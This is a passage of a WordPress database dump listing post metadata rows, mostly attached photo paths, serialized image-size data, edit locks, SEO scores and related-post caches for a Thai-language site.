(8776, 649, '_wp_old_slug', '%e0%b8%a3%e0%b8%ad%e0%b8%87%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%ad%e0%b8%b3%e0%b8%99%e0%b8%a7%e0%b8%a2%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9d%e0%b9%88%e0%b8%b2%e0%b8%a2%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%ab'),
(8777, 649, '_yoast_wpseo_primary_category', ''),
(8778, 922, '_yoast_wpseo_primary_category', ''),
(8779, 3945, '_wp_attached_file', '2018/01/555-1-e1537240242266.jpg'),
(8780, 3945, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:250;s:6:\"height\";i:245;s:4:\"file\";s:32:\"2018/01/555-1-e1537240242266.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:47:\"รองอานุภาพ555-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:47:\"รองอานุภาพ555-1-300x293.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:293;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:47:\"รองอานุภาพ555-1-307x300.jpg\";s:5:\"width\";i:307;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(8781, 3945, '_wp_attachment_backup_sizes', 'a:1:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:506;s:6:\"height\";i:495;s:4:\"file\";s:9:\"555-1.jpg\";}}'),
(8782, 649, '_thumbnail_id', '12154'),
(8789, 3947, '_wp_attached_file', '2018/01/6-2-2561-9-56-49.jpg'),
(8790, 3947, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:150;s:6:\"height\";i:200;s:4:\"file\";s:28:\"2018/01/6-2-2561-9-56-49.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"6-2-2561-9-56-49-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8793, 3954, '_edit_lock', '1537253796:3'),
(8794, 3954, '_edit_last', '3'),
(8795, 3955, '_wp_attached_file', '2018/09/18-9-2561-13-58-30.jpg'),
(8796, 3955, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:511;s:6:\"height\";i:666;s:4:\"file\";s:30:\"2018/09/18-9-2561-13-58-30.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"18-9-2561-13-58-30-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"18-9-2561-13-58-30-230x300.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"18-9-2561-13-58-30-230x300.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8797, 3956, '_wp_attached_file', '2018/09/41459299_2197120207219746_4458247611698118656_o.jpg'),
(8798, 3956, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:59:\"2018/09/41459299_2197120207219746_4458247611698118656_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"41459299_2197120207219746_4458247611698118656_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:59:\"41459299_2197120207219746_4458247611698118656_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:59:\"41459299_2197120207219746_4458247611698118656_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:60:\"41459299_2197120207219746_4458247611698118656_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:59:\"41459299_2197120207219746_4458247611698118656_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8799, 3954, '_thumbnail_id', '3956'),
(8803, 3954, '_hide_featured', NULL),
(8804, 3954, '_yoast_wpseo_content_score', '30'),
(8805, 3954, '_yoast_wpseo_primary_category', '31'),
(8806, 3954, '_wpas_done_all', '1'),
(8807, 3958, '_edit_lock', '1537254076:3'),
(8808, 3958, '_edit_last', '3'),
(8809, 3959, '_wp_attached_file', '2018/09/41500274_2196630480602052_7892302092038045696_o.jpg'),
(8810, 3959, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1568;s:6:\"height\";i:1044;s:4:\"file\";s:59:\"2018/09/41500274_2196630480602052_7892302092038045696_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"41500274_2196630480602052_7892302092038045696_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:59:\"41500274_2196630480602052_7892302092038045696_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:59:\"41500274_2196630480602052_7892302092038045696_o-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:60:\"41500274_2196630480602052_7892302092038045696_o-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:59:\"41500274_2196630480602052_7892302092038045696_o-400x266.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:266;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8811, 3958, '_thumbnail_id', '3959'),
(8815, 3958, '_hide_featured', NULL),
(8816, 3958, '_yoast_wpseo_content_score', '30'),
(8817, 3958, '_yoast_wpseo_primary_category', '31'),
(8818, 3958, '_wpas_done_all', '1'),
(8819, 3961, '_edit_lock', '1537254172:3'),
(8820, 3961, '_edit_last', '3'),
(8821, 3962, '_wp_attached_file', '2018/09/18-9-2561-14-05-14.jpg'),
(8822, 3962, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:410;s:6:\"height\";i:627;s:4:\"file\";s:30:\"2018/09/18-9-2561-14-05-14.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"18-9-2561-14-05-14-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"18-9-2561-14-05-14-196x300.jpg\";s:5:\"width\";i:196;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"18-9-2561-14-05-14-196x300.jpg\";s:5:\"width\";i:196;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8823, 3954, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575716792;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6054;}i:1;a:1:{s:2:\"id\";i:4735;}i:2;a:1:{s:2:\"id\";i:5388;}}}}'),
(8824, 3958, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575649687;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4964;}i:1;a:1:{s:2:\"id\";i:3988;}i:2;a:1:{s:2:\"id\";i:3954;}}}}'),
(8825, 3963, '_wp_attached_file', '2018/09/41667450_676746312701560_2795209667364519936_o.jpg'),
(8826, 3963, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1944;s:6:\"height\";i:1296;s:4:\"file\";s:58:\"2018/09/41667450_676746312701560_2795209667364519936_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"41667450_676746312701560_2795209667364519936_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"41667450_676746312701560_2795209667364519936_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"41667450_676746312701560_2795209667364519936_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"41667450_676746312701560_2795209667364519936_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"41667450_676746312701560_2795209667364519936_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8827, 3961, '_thumbnail_id', '3963'),
(8831, 3961, '_hide_featured', NULL),
(8832, 3961, '_yoast_wpseo_content_score', '30'),
(8833, 3961, '_yoast_wpseo_primary_category', '31'),
(8834, 3961, '_wpas_done_all', '1'),
(8835, 3965, '_edit_lock', '1537254418:3'),
(8836, 3965, '_edit_last', '3'),
(8837, 3966, '_wp_attached_file', '2018/09/41500268_676753659367492_7936221078987210752_o.jpg'),
(8838, 3966, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:58:\"2018/09/41500268_676753659367492_7936221078987210752_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"41500268_676753659367492_7936221078987210752_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"41500268_676753659367492_7936221078987210752_o-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"41500268_676753659367492_7936221078987210752_o-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"41500268_676753659367492_7936221078987210752_o-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"41500268_676753659367492_7936221078987210752_o-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8839, 3965, '_thumbnail_id', '3966'),
(8843, 3965, '_hide_featured', NULL),
(8844, 3965, '_yoast_wpseo_content_score', '30'),
(8845, 3965, '_yoast_wpseo_primary_category', '31'),
(8846, 3965, '_wpas_done_all', '1'),
(8847, 3968, '_edit_lock', '1537254404:3'),
(8848, 3968, '_edit_last', '3'),
(8849, 3969, '_wp_attached_file', '2018/09/41556893_676868739355984_1945381728503726080_o.jpg'),
(8850, 3969, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:58:\"2018/09/41556893_676868739355984_1945381728503726080_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"41556893_676868739355984_1945381728503726080_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"41556893_676868739355984_1945381728503726080_o-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"41556893_676868739355984_1945381728503726080_o-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"41556893_676868739355984_1945381728503726080_o-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"41556893_676868739355984_1945381728503726080_o-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8851, 3968, '_thumbnail_id', '3969'),
(8855, 3968, '_hide_featured', NULL),
(8856, 3968, '_yoast_wpseo_content_score', '30'),
(8857, 3968, '_yoast_wpseo_primary_category', '31'),
(8858, 3968, '_wpas_done_all', '1'),
(8859, 3971, '_edit_lock', '1537254758:3'),
(8860, 3971, '_edit_last', '3'),
(8861, 3972, '_wp_attached_file', '2018/09/18-9-2561-14-12-34.jpg'),
(8862, 3972, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:460;s:6:\"height\";i:582;s:4:\"file\";s:30:\"2018/09/18-9-2561-14-12-34.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"18-9-2561-14-12-34-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"18-9-2561-14-12-34-237x300.jpg\";s:5:\"width\";i:237;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"18-9-2561-14-12-34-237x300.jpg\";s:5:\"width\";i:237;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8863, 3973, '_wp_attached_file', '2018/09/41598651_676885376020987_5476268467030065152_o.jpg'),
(8864, 3973, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1944;s:6:\"height\";i:1296;s:4:\"file\";s:58:\"2018/09/41598651_676885376020987_5476268467030065152_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"41598651_676885376020987_5476268467030065152_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"41598651_676885376020987_5476268467030065152_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"41598651_676885376020987_5476268467030065152_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"41598651_676885376020987_5476268467030065152_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"41598651_676885376020987_5476268467030065152_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8865, 3971, '_thumbnail_id', '3973'),
(8869, 3971, '_hide_featured', NULL),
(8870, 3971, '_yoast_wpseo_content_score', '30'),
(8871, 3971, '_yoast_wpseo_primary_category', '31'),
(8872, 3971, '_wpas_done_all', '1'),
(8873, 3975, '_edit_lock', '1537255284:3'),
(8874, 3975, '_edit_last', '3'),
(8875, 3976, '_wp_attached_file', '2018/09/18-9-2561-14-18-54.jpg'),
(8876, 3976, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:460;s:6:\"height\";i:609;s:4:\"file\";s:30:\"2018/09/18-9-2561-14-18-54.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"18-9-2561-14-18-54-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"18-9-2561-14-18-54-227x300.jpg\";s:5:\"width\";i:227;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"18-9-2561-14-18-54-227x300.jpg\";s:5:\"width\";i:227;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8877, 3977, '_wp_attached_file', '2018/09/41788378_677196889323169_1259277285836455936_o.jpg'),
(8878, 3977, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1944;s:6:\"height\";i:1296;s:4:\"file\";s:58:\"2018/09/41788378_677196889323169_1259277285836455936_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"41788378_677196889323169_1259277285836455936_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"41788378_677196889323169_1259277285836455936_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"41788378_677196889323169_1259277285836455936_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"41788378_677196889323169_1259277285836455936_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"41788378_677196889323169_1259277285836455936_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8879, 3975, '_thumbnail_id', '3977'),
(8883, 3975, '_hide_featured', NULL);
INSERT INTO `wp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(8884, 3975, '_yoast_wpseo_content_score', '30'),
(8885, 3975, '_yoast_wpseo_primary_category', '31'),
(8886, 3975, '_wpas_done_all', '1'),
(8887, 3979, '_edit_lock', '1537255540:3'),
(8888, 3979, '_edit_last', '3'),
(8889, 3980, '_wp_attached_file', '2018/09/41611741_677300639312794_3837811917611597824_o.jpg'),
(8890, 3980, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1944;s:6:\"height\";i:1296;s:4:\"file\";s:58:\"2018/09/41611741_677300639312794_3837811917611597824_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"41611741_677300639312794_3837811917611597824_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"41611741_677300639312794_3837811917611597824_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"41611741_677300639312794_3837811917611597824_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"41611741_677300639312794_3837811917611597824_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"41611741_677300639312794_3837811917611597824_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8891, 3975, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575369228;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3971;}i:1;a:1:{s:2:\"id\";i:3979;}i:2;a:1:{s:2:\"id\";i:4971;}}}}'),
(8892, 3979, '_thumbnail_id', '3980'),
(8896, 3979, '_hide_featured', NULL),
(8897, 3979, '_yoast_wpseo_content_score', '30'),
(8898, 3979, '_yoast_wpseo_primary_category', '31'),
(8899, 3979, '_wpas_done_all', '1'),
(8900, 3982, '_edit_lock', '1537255780:3'),
(8901, 3982, '_edit_last', '3'),
(8902, 3983, '_wp_attached_file', '2018/09/41836333_678154112560780_2475173181485219840_n.jpg'),
